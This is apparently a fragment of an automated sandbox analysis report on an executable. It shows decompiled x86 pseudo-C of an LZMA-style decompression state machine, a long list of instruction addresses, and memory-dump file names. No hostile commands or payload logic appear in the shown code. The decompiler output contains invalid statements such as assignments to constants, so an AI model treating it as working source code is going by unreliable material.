											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406a2b
0x00406a2b
0x00406a2b
0x00406a2b
0x00406a31
0x00406a35
0x00406a39
0x00406a43
0x00406a51
0x00406d27
0x00406d27
0x00406d2a
0x00406d31
0x00406d5e
0x00406d5e
0x00406d62
0x00000000
0x00000000
0x00406d64
0x00406d6d
0x00406d73
0x00406d76
0x00406d79
0x00406d7c
0x00406d7f
0x00406d85
0x00406d9e
0x00406da1
0x00406dad
0x00406dae
0x00406db1
0x00406d87
0x00406d87
0x00406d96
0x00406d99
0x00406d99
0x00406dbb
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5e
0x00406d62
0x00000000
0x00000000
0x00000000
0x00406dbd
0x00406dbd
0x00406d36
0x00406d3a
0x00406e72
0x00406e72
0x00406e7c
0x00406e84
0x00406e8b
0x00406e8d
0x00406e94
0x00406e98
0x00406e98
0x00406d40
0x00406d46
0x00406d4d
0x00406d55
0x00406d55
0x00406d58
0x00000000
0x00406d58
0x00406dc2
0x00406dcf
0x00406dd2
0x00406cde
0x00406cde
0x00406cde
0x0040647a
0x0040647a
0x0040647a
0x00406483
0x00000000
0x00000000
0x00406489
0x00406489
0x00000000
0x00406490
0x00406494
0x00000000
0x00000000
0x0040649a
0x0040649d
0x004064a0
0x004064a3
0x004064a7
0x00000000
0x00000000
0x004064ad
0x004064ad
0x004064b0
0x004064b2
0x004064b3
0x004064b6
0x004064b8
0x004064b9
0x004064bb
0x004064be
0x004064c3
0x004064c8
0x004064d1
0x004064e4
0x004064e7
0x004064f3
0x0040651b
0x0040651d
0x0040652b
0x0040652b
0x0040652f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040651f
0x0040651f
0x00406522
0x00406523
0x00406523
0x00000000
0x0040651f
0x004064f5
0x004064f9
0x004064fe
0x004064fe
0x00406507
0x0040650f
0x00406512
0x00000000
0x00406518
0x00406518
0x00000000
0x00406518
0x00000000
0x00406535
0x00406535
0x00406539
0x00406de5
0x00406de5
0x00000000
0x00406de5
0x0040653f
0x00406542
0x00406552
0x00406555
0x00406558
0x00406558
0x00406558
0x0040655b
0x0040655f
0x00000000
0x00000000
0x00406561
0x00406561
0x00406567
0x00406591
0x00406597
0x0040659e
0x00000000
0x0040659e
0x00406569
0x0040656d
0x00406570
0x00406575
0x00406575
0x00406580
0x00406588
0x0040658b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065d0
0x004065d6
0x004065d9
0x004065e6
0x004065ee
0x00000000
0x00000000
0x004065a5
0x004065a5
0x004065a9
0x00406df4
0x00406df4
0x00000000
0x00406df4
0x004065af
0x004065b5
0x004065c0
0x004065c0
0x004065c0
0x004065c3
0x004065c6
0x004065c9
0x004065ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c65
0x00406c65
0x00406c6b
0x00406c71
0x00406c77
0x00406c91
0x00406c94
0x00406c9a
0x00406ca5
0x00406ca5
0x00406ca7
0x00406c79
0x00406c79
0x00406c88
0x00406c8c
0x00406c8c
0x00406cb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cb3
0x00406cb7
0x00406e66
0x00406e66
0x00000000
0x00406e66
0x00406cbd
0x00406cc3
0x00406cca
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cde
0x00406cde
0x00000000
0x00000000
0x004065f6
0x004065f6
0x004065f8
0x004065fb
0x0040666c
0x0040666c
0x0040666f
0x00406672
0x00406679
0x00406683
0x00000000
0x00406683
0x004065fd
0x004065fd
0x00406601
0x00406604
0x00406606
0x00406609
0x0040660c
0x0040660e
0x00406611
0x00406613
0x00406618
0x0040661b
0x0040661e
0x00406622
0x00406629
0x0040662c
0x00406633
0x00406637
0x0040663f
0x0040663f
0x0040663f
0x00406639
0x00406639
0x00406639
0x0040662e
0x0040662e
0x0040662e
0x00406643
0x00406646
0x00406664
0x00406664
0x00406666
0x00000000
0x00406648
0x00406648
0x00406648
0x0040664b
0x0040664e
0x00406651
0x00406653
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665b
0x0040665c
0x0040665f
0x00000000
0x0040665f
0x00000000
0x00406895
0x00406895
0x00406899
0x004068b7
0x004068b7
0x004068ba
0x004068c1
0x004068c4
0x004068c7
0x004068ca
0x004068cd
0x004068d0
0x004068d2
0x004068d9
0x004068da
0x004068dc
0x004068df
0x004068e2
0x004068e5
0x004068e5
0x004068ea
0x00000000
0x004068ea
0x0040689b
0x0040689b
0x0040689e
0x004068a1
0x004068ab
0x00000000
0x00000000
0x004068ff
0x004068ff
0x00406903
0x00406926
0x00406929
0x0040692c
0x00406936
0x00406905
0x00406905
0x00406908
0x0040690b
0x0040690e
0x0040691b
0x0040691e
0x0040691e
0x00000000
0x00000000
0x00406942
0x00406942
0x00406946
0x00000000
0x00000000
0x0040694c
0x0040694c
0x00406950
0x00000000
0x00000000
0x00406956
0x00406956
0x00406958
0x0040695c
0x0040695c
0x0040695f
0x00406963
0x00000000
0x00000000
0x004069b3
0x004069b3
0x004069b7
0x004069be
0x004069be
0x004069c1
0x004069c4
0x004069ce
0x00000000
0x004069ce
0x004069b9
0x004069b9
0x00000000
0x00000000
0x004069da
0x004069da
0x004069de
0x004069e5
0x004069e8
0x004069eb
0x004069e0
0x004069e0
0x004069e0
0x004069ee
0x004069f1
0x004069f4
0x004069f4
0x004069f7
0x004069fa
0x004069fd
0x004069fd
0x00406a00
0x00406a07
0x00406a0c
0x00000000
0x00000000
0x00406a9a
0x00406a9a
0x00406a9e
0x00406e3c
0x00406e3c
0x00000000
0x00406e3c
0x00406aa4
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aae
0x00406ab1
0x00406ab7
0x00406ab9
0x00406ab9
0x00406ab9
0x00406abc
0x00406abf
0x00000000
0x00000000
0x0040668f
0x0040668f
0x00406693
0x00406e00
0x00406e00
0x00000000
0x00406e00
0x00406699
0x00406699
0x0040669c
0x0040669f
0x004066a3
0x004066a6
0x004066ac
0x004066ae
0x004066ae
0x004066ae
0x004066b1
0x004066b4
0x004066b4
0x004066b7
0x004066ba
0x00000000
0x00000000
0x004066c0
0x004066c0
0x004066c6
0x00000000
0x00000000
0x004066cc
0x004066cc
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066dc
0x004066dd
0x004066e0
0x004066e2
0x004066e8
0x004066eb
0x004066ee
0x004066f1
0x004066f4
0x004066f7
0x004066fa
0x00406716
0x00406719
0x0040671c
0x0040671f
0x00406726
0x0040672a
0x0040672c
0x00406730
0x004066fc
0x004066fc
0x00406700
0x00406708
0x0040670d
0x0040670f
0x00406711
0x00406711
0x00406733
0x0040673a
0x0040673d
0x00000000
0x00406743
0x00406743
0x00000000
0x00406743
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406e0c
0x00406e0c
0x00000000
0x00406e0c
0x00406752
0x00406752
0x00406755
0x00406758
0x0040675c
0x0040675f
0x00406765
0x00406767
0x00406767
0x00406767
0x0040676a
0x0040676d
0x0040676d
0x0040676d
0x00406773
0x00000000
0x00000000
0x00406775
0x00406775
0x00406778
0x0040677b
0x0040677e
0x00406781
0x00406784
0x00406787
0x0040678a
0x0040678d
0x00406790
0x00406793
0x004067ab
0x004067ae
0x004067b1
0x004067b4
0x004067b4
0x004067b7
0x004067bb
0x004067bd
0x00406795
0x00406795
0x0040679d
0x004067a2
0x004067a4
0x004067a6
0x004067a6
0x004067c0
0x004067c7
0x004067ca
0x00000000
0x004067cc
0x004067cc
0x00000000
0x004067cc
0x004067ca
0x004067d1
0x004067d1
0x004067d1
0x004067d1
0x00000000
0x00000000
0x0040680c
0x0040680c
0x00406810
0x00406e18
0x00406e18
0x00000000
0x00406e18
0x00406816
0x00406816
0x00406819
0x0040681c
0x00406820
0x00406823
0x00406829
0x0040682b
0x0040682b
0x0040682b
0x0040682e
0x00406831
0x00406831
0x00406837
0x004067d5
0x004067d5
0x004067d8
0x00000000
0x004067d8
0x00406839
0x00406839
0x0040683c
0x0040683f
0x00406842
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406851
0x00406854
0x00406857
0x0040686f
0x00406872
0x00406875
0x00406878
0x00406878
0x0040687b
0x0040687f
0x00406881
0x00406859
0x00406859
0x00406861
0x00406866
0x00406868
0x0040686a
0x0040686a
0x00406884
0x0040688b
0x0040688e
0x00000000
0x00406890
0x00406890
0x00000000
0x00406890
0x00000000
0x00406b1d
0x00406b1d
0x00406b21
0x00406e48
0x00406e48
0x00000000
0x00406e48
0x00406b27
0x00406b27
0x00406b2a
0x00406b2d
0x00406b31
0x00406b34
0x00406b3a
0x00406b3c
0x00406b3c
0x00406b3c
0x00406b3f
0x00000000
0x00000000
0x004068ed
0x004068ed
0x004068f0
0x00000000
0x00000000
0x00406c2c
0x00406c2c
0x00406c30
0x00406c52
0x00406c52
0x00406c55
0x00406c5f
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00406c32
0x00406c32
0x00406c35
0x00406c39
0x00406c3c
0x00406c3c
0x00406c3f
0x00000000
0x00000000
0x00406ce9
0x00406ce9
0x00406ced
0x00406d0b
0x00406d0b
0x00406d0b
0x00406d0b
0x00406d12
0x00406d19
0x00406d20
0x00406d20
0x00406d27
0x00406d2a
0x00406d31
0x00000000
0x00406d34
0x00406cef
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf8
0x00406cff
0x00406c43
0x00406c43
0x00406c46
0x00000000
0x00000000
0x00406dda
0x00406dda
0x00406ddd
0x00406cde
0x00406cde
0x00406cde
0x00000000
0x00406ce4
0x00000000
0x00406a14
0x00406a14
0x00406a16
0x00406a1d
0x00406a1e
0x00406a20
0x00406a23
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d27
0x00406d27
0x00406d2a
0x00406d31
0x00000000
0x00406d34
0x00000000
0x00000000
0x00000000
0x00406a59
0x00406a59
0x00406a5c
0x00406a92
0x00406a92
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc5
0x00406bc5
0x00406bc8
0x00406bca
0x00406e54
0x00406e54
0x00000000
0x00406e54
0x00406bd0
0x00406bd0
0x00406bd3
0x00000000
0x00000000
0x00406bd9
0x00406bd9
0x00406bdd
0x00406be0
0x00406be0
0x00406be0
0x00000000
0x00406be0
0x00406a5e
0x00406a5e
0x00406a60
0x00406a62
0x00406a64
0x00406a67
0x00406a68
0x00406a6a
0x00406a6c
0x00406a6f
0x00406a72
0x00406a88
0x00406a88
0x00406a8d
0x00406ac5
0x00406ac5
0x00406ac9
0x00406af2
0x00406af5
0x00406af7
0x00406afe
0x00406b01
0x00406b04
0x00406b04
0x00406b09
0x00406b09
0x00406b0b
0x00406b0e
0x00406b15
0x00406b18
0x00406b45
0x00406b45
0x00406b48
0x00406b4b
0x00406bbf
0x00406bbf
0x00406bbf
0x00406bbf
0x00000000
0x00406bbf
0x00406b4d
0x00406b4d
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b65
0x00406b68
0x00406b6b
0x00406b6e
0x00406b87
0x00406b89
0x00406b8c
0x00406b8d
0x00406b90
0x00406b92
0x00406b95
0x00406b97
0x00406b99
0x00406b9c
0x00406b9e
0x00406ba1
0x00406ba5
0x00406ba7
0x00406ba7
0x00406ba8
0x00406bab
0x00406bae
0x00406b70
0x00406b70
0x00406b78
0x00406b7d
0x00406b7f
0x00406b82
0x00406b82
0x00406bb1
0x00406bb8
0x00406b42
0x00406b42
0x00406b42
0x00406b42
0x00000000
0x00406bba
0x00406bba
0x00000000
0x00406bba
0x00406bb8
0x00406acb
0x00406acb
0x00406ace
0x00406ad0
0x00406ad3
0x00406ad6
0x00406ad9
0x00406adb
0x00406ade
0x00406ae1
0x00406ae1
0x00406ae4
0x00406ae4
0x00406ae7
0x00406aee
0x00406ac2
0x00406ac2
0x00406ac2
0x00406ac2
0x00000000
0x00406af0
0x00406af0
0x00000000
0x00406af0
0x00406aee
0x00406a74
0x00406a74
0x00406a77
0x00406a79
0x00406a7c
0x00000000
0x00000000
0x004067db
0x004067db
0x004067df
0x00406e24
0x00406e24
0x00000000
0x00406e24
0x004067e5
0x004067e5
0x004067e8
0x004067eb
0x004067ee
0x004067f1
0x004067f4
0x004067f7
0x004067f9
0x004067fc
0x004067ff
0x00406802
0x00406804
0x00406804
0x00406804
0x00000000
0x00000000
0x00406966
0x00406966
0x0040696a
0x00406e30
0x00406e30
0x00000000
0x00406e30
0x00406970
0x00406970
0x00406973
0x00406976
0x00406979
0x0040697b
0x0040697b
0x0040697b
0x0040697e
0x00406981
0x00406984
0x00406987
0x0040698a
0x0040698d
0x0040698e
0x00406990
0x00406990
0x00406990
0x00406993
0x00406996
0x00406999
0x0040699c
0x0040699c
0x0040699c
0x0040699f
0x004069a1
0x004069a1
0x00000000
0x00000000
0x00406be3
0x00406be3
0x00406be3
0x00406be7
0x00000000
0x00000000
0x00406bed
0x00406bed
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf8
0x00406bf8
0x00406bf8
0x00406bfb
0x00406bfe
0x00406c01
0x00406c04
0x00406c07
0x00406c0a
0x00406c0b
0x00406c0d
0x00406c0d
0x00406c0d
0x00406c10
0x00406c13
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c22
0x00406c25
0x00000000
0x00406c27
0x00406c27
0x004069a4
0x004069a4
0x00000000
0x004069a4
0x00406c25
0x00406e5a
0x00406e5a
0x00000000
0x00000000
0x00406489
0x00406e91
0x00406e91
0x00000000
0x00406e91
0x00406cde
0x00406d5e
0x00406d27

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
